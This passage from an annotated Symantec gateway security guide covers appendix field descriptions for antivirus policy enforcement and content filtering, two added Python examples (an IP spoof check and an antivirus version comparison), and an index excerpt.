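constructed for this demonstration; the WAN-side rule is an added assumption.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Iterable, List, Tuple

# Constructed addressing plan: source prefixes each internal interface may carry.
INTERFACE_NETS = {
    "LAN": [ip_network("192.168.0.0/24")],
    "WLAN": [ip_network("192.168.1.0/24")],
}
INTERNAL_NETS = [net for nets in INTERFACE_NETS.values() for net in nets]


@dataclass(frozen=True)
class Packet:
    iface: str  # interface the packet arrived on: "WAN", "LAN" or "WLAN"
    src: str    # source IPv4 address as text
    dst: str    # destination IPv4 address as text


def is_spoofed(pkt: Packet, protected: Iterable[str] = ("LAN", "WLAN")) -> bool:
    """True if `pkt` should be dropped as spoofed.

    `protected` lists the internal interfaces with spoof protection enabled
    (the LAN and WLAN/LAN fields). The WAN check always runs (assumption).
    """
    src = ip_address(pkt.src)
    if pkt.iface == "WAN":
        # Nothing on the Internet may claim an inside or loopback address.
        return src.is_loopback or any(src in net for net in INTERNAL_NETS)
    if pkt.iface not in protected:
        return False
    if src.is_unspecified:
        # 0.0.0.0 is legitimate for DHCP DISCOVER/REQUEST before a lease exists;
        # dropping it would break address assignment on the segment.
        return False
    return not any(src in net for net in INTERFACE_NETS.get(pkt.iface, []))


def filter_packets(packets: Iterable[Packet]) -> List[Tuple[Packet, str]]:
    """Tag each packet 'pass' or 'drop' as the spoof check would."""
    return [(p, "drop" if is_spoofed(p) else "pass") for p in packets]


# Constructed sample traffic, one packet per case the check distinguishes.
SAMPLE_PACKETS = [
    Packet("WAN", "198.51.100.7", "192.168.0.10"),   # normal inbound
    Packet("WAN", "192.168.0.10", "192.168.0.1"),    # inside address from outside
    Packet("WAN", "127.0.0.1", "192.168.0.1"),       # loopback from outside
    Packet("LAN", "192.168.0.10", "198.51.100.7"),   # normal outbound
    Packet("LAN", "192.168.1.20", "198.51.100.7"),   # WLAN address on the wired segment
    Packet("LAN", "0.0.0.0", "255.255.255.255"),     # DHCP discover, must pass
    Packet("WLAN", "10.0.0.5", "198.51.100.7"),      # foreign address on wireless
]

if __name__ == "__main__":
    for pkt, verdict in filter_packets(SAMPLE_PACKETS):
        print(f"{verdict:4} {pkt.iface:4} {pkt.src:>15} -> {pkt.dst}")
```

The DHCP case is the one that bites in practice: a naive "source must be in the segment" rule drops the all-zero source of a DISCOVER and clients on the protected segment never get an address.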
  • Page 207: AVpe Field Descriptions

    AVpe field descriptions. The AVpe feature lets you monitor client AVpe configurations and, if necessary, enforce security policies to restrict network access to only those clients that are protected by antivirus software with the most current virus definitions.
    Table C-34 AVpe tab field descriptions
  • Page 208

    Policy Validation, Verify AV Client is Active: When enabled, this field lets you verify that Symantec antivirus software is installed and active on a client's workstation. Options include:
    ■ Latest Product Engine (default): Verifies that Symantec antivirus software is active and that it contains the latest product scan engine.
  • Page 209

    Displays the current product version of the Symantec AntiVirus Corporate Edition that the antivirus server is running; for example: 7.61.928.
    Engine: Displays the current version of the Symantec AntiVirus Corporate Edition scan engine that is running on the antivirus server; for example: NAV 4.1.0.15.
    Pattern: Displays the latest version of the virus definition file on the antivirus server; ...
  • Page 210: Content Filtering Field Descriptions

    Product: Name of the Symantec antivirus product that the client is using.
    Engine: Version of the scan engine in the Symantec antivirus product the client is using.
    Pattern: Version of the client's most recent virus definitions.
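Pages 208 to 210 describe the inputs to the AVpe decision (the server's Product, Engine and Pattern versions, the client's reported versions, and the Verify AV Client is Active option) without showing the comparison. The block below is an added example written for this page, not Symantec's AVpe code: it compares a client's state with the server's numerically, component by component, so that "NAV 4.1.0.15" correctly outranks "NAV 4.1.0.9" (a string comparison would get that wrong). The version strings "7.61.928" and "NAV 4.1.0.15" are the guide's own examples; the pattern values, client records, comparison rules and the mode names other than the guide's "Latest Product Engine" default are assumptions for the demonstration.

```python
"""Added example (not Symantec's code): the comparison an AVpe-style policy
check makes between the antivirus server's state (Product, Engine, Pattern)
and a client's reported state before deciding whether the client may reach
the network.

"7.61.928" and "NAV 4.1.0.15" are the guide's example values; the pattern
values, the client records, the comparison rules (numeric, component-wise;
an engine or pattern older than the server's fails) and the mode names other
than the guide's "Latest Product Engine" default are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class AvState:
    product: str         # e.g. "7.61.928"
    engine: str          # e.g. "NAV 4.1.0.15"
    pattern: str         # e.g. "20040312.003" (constructed; date.revision)
    active: bool = True  # whether the scanner is installed and running


def version_key(text: str) -> Tuple[int, ...]:
    """Turn 'NAV 4.1.0.15' into (4, 1, 0, 15) so versions compare numerically.

    Letters are ignored, so '4.1.0.15' and 'NAV 4.1.0.15' compare equal, and
    '4.1.0.15' sorts after '4.1.0.9' as a version should.
    """
    parts = re.findall(r"\d+", text)
    if not parts:
        raise ValueError(f"no numeric version in {text!r}")
    return tuple(int(p) for p in parts)


def validate_client(server: AvState, client: Optional[AvState],
                    mode: str = "latest_engine") -> Tuple[bool, str]:
    """Decide whether `client` meets policy; returns (allowed, reason).

    mode: 'active_only'    - scanner installed and active is enough
          'latest_engine'  - additionally engine >= server's engine (the
                             guide's default, "Latest Product Engine")
          'latest_pattern' - additionally definitions >= server's definitions
    """
    if client is None or not client.active:
        return False, "antivirus not installed or not active"
    if mode == "active_only":
        return True, "antivirus active"
    if version_key(client.engine) < version_key(server.engine):
        return False, f"scan engine {client.engine} is older than {server.engine}"
    if mode == "latest_pattern" and version_key(client.pattern) < version_key(server.pattern):
        return False, f"virus definitions {client.pattern} are older than {server.pattern}"
    return True, "client meets the antivirus policy"


# Constructed states: the server's current versions and several example clients.
SERVER = AvState(product="7.61.928", engine="NAV 4.1.0.15", pattern="20040312.003")
CLIENTS = {
    "current":    AvState("7.61.928", "NAV 4.1.0.15", "20040312.003"),
    "old_engine": AvState("7.60.926", "NAV 4.1.0.9", "20040312.003"),
    "old_defs":   AvState("7.61.928", "NAV 4.1.0.15", "20040301.001"),
    "inactive":   AvState("7.61.928", "NAV 4.1.0.15", "20040312.003", active=False),
    "none":       None,
}

if __name__ == "__main__":
    for name, client in CLIENTS.items():
        allowed, reason = validate_client(SERVER, client)
        print(f"{name:10} {'allow' if allowed else 'deny ':5} {reason}")
```

Note what the default mode does not check: a client with the latest engine but stale definitions passes under "Latest Product Engine", so the stricter mode is the one that matches the page 207 goal of admitting only clients "with the most current virus definitions".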
  • Page 211

    Modify List, Input URL: Type a URL to add to the deny or allow list; for example, www.symantec.com or myadultsite.com/mypics/me.html. The maximum length of a URL is 128 characters. Each filtering list can hold up to 100 entries. You add URLs one at a time.
  • Pages 213–217: Index (excerpt)

    WAN/ISP settings 50
    AES-128 93
    AES-192 93
    AES-256 93
    alive indicator 28, 40, 53
    all.bin 129
    allow list 111
    Client-to-Gateway tunnels, global policy settings 101
    clusters, creating tunnels to Symantec Gateway 5400 Series clusters 91
    compression, tunnel 82
    computer group membership 65
    Maximum Transmission Unit (MTU) 45
    verifying connectivity 42
    new computers 65
    dial-up connection 29
    port assignments 60
    disabling PPTP 36
    dynamic DNS 48
    remote management 17
    NAT mode 77
    routing 48
    special applications 74
    disconnect idle PPPoE connections 31
    static IP 35
    DNS gateway 53
    static route entries 49
    tunnel persistence and high-availability 90
    gateway-to-gateway supported VPN tunnels 90
    Main menu 14
    managing administrative access 15
    Girlfriend 116
    Global IKE Policy 83
    managing content filtering lists 112
    global policy settings, Client-to-Gateway tunnels 101
    managing ICMP requests 79
    using the serial console 19
    manual dial-up accounts 42
    manually connect to PPTP account 38
    IP spoofing 117
    TCP flag validation 118
    subnet 90
    SubSeven 116
    Symantec Gateway Security 5400 Series 90, 91
    protection preferences (configuring; settings) 116
    Syndrop 116
    T1 connectivity 30
    Query Services 167
    T3 29
    PPPoE connectivity 33
    video conferencing 74
    authentication key lengths 93
    configuring Client-to-Gateway tunnels 96
    creating custom phase 2 policies 84
    creating tunnels to Symantec Gateway Security 5400 Series clusters 91
    encryption key lengths 93
    global policy settings 101
    monitoring tunnel status 102
